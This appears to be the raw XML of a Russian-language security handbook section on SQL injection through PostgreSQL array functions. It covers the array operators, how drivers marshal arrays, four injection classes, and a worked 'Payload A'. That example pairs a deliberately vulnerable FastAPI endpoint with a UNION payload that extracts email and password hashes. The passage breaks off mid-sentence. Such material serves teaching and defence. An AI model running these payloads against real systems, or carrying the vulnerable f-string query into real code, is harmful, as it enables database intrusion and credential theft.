        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.11.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB5B1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B12E85C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL имеет первоклассную поддержку массивов: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsonb[]</w:t>
      </w:r>
      <w:r>
        <w:t>, и т.д. Операторы для работы с array-target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68EB2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`x = ANY(array)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> равно хотя бы одному элементу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x IN (...)</w:t>
      </w:r>
      <w:r>
        <w:t>, но с array-аргументом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57135B24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`x = ALL(array)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> равно всем элементам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C5197" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`array @&gt; array`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — left-array содержит right-array (containment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2DBB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`array &lt;@ array`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — left-array содержится в right-array (contained).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E37E08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`array &amp;&amp; array`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пересечение (overlap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066B320" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Driver-уровневое маршалирование:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2B1A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psycopg2 / psycopg3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. По умолчанию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARRAY[1, 2, 3]::int[]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9579FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asyncpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t>. Идентично psycopg, но с разной семантикой type inference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44755BC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Array.of(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; для bind variable используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setArray()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (типизированно) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setObject(..., Types.ARRAY)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E2FEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>node-postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARRAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg.types</w:t>
      </w:r>
      <w:r>
        <w:t>-codec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03910951" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pgx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Go) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgtype.Int4Array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через codec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F0BB7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Injection-классы в 3.11.4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38115A86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`string_to_array` injection через separator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string_to_array('$user_input', ',')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретирует первый параметр как text, разделитель — литерал. Атакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>содержимое строки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string_to_array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cast в array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAA804" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Type-confusion при scalar vs array bind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — драйверы делают разные предположения о типе bind value. Атакующий может передать форму, которая на одном драйвере scalar, на другом array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C530E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Containment-операторы (`@&gt;`, `&lt;@`, `&amp;&amp;`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с user-controlled array — bypass проверок типа «id входит в whitelist».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692B235D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`unnest`-обратная операция</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT unnest(string_to_array('$x', ','))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разворачивает array в строки, что меняет семантику UNION-payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F89A7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — separator injection в string_to_array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AFF2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: эндпоинт принимает comma-separated список ID для batch-операции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2C5EC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users/batch")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CD4D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_batch(ids: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBDAF5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT * FROM users WHERE id = ANY(string_to_array('{ids}', ',')::int[])")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD87A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B494492"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34D84C0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application ожидает: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ids = "1,2,3"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id IN (1, 2, 3)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9DB8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ids</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E986160" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1,2,3'::int[]) UNION SELECT id, email, password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DC7FB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C28E2"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id = ANY(string_to_array('1,2,3'::int[]) UNION SELECT id, email, password_hash FROM users--', ',')::int[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37592FAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После interpolation одинарная кавычка после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разрывает строковый литерал в string_to_array. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int[])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> закрывает преждевременно. Дальше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT id, email, password_hash FROM users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — классический UNION-canal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> затирает остаток.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73870E49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Корректное представление с разорванной структурой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BEBD3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2C74E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = ANY(string_to_array('1,2,3', ',')::int[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934EA62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E106C6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT id, email, password_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C3544" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603436DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--', ',')::int[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2988DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это классическая SQLi (3.1 UNION) через type-cast point. Особенность: входная точка — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string_to_array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-аргумент, что </w:t>
      </w:r>
      <w:r>
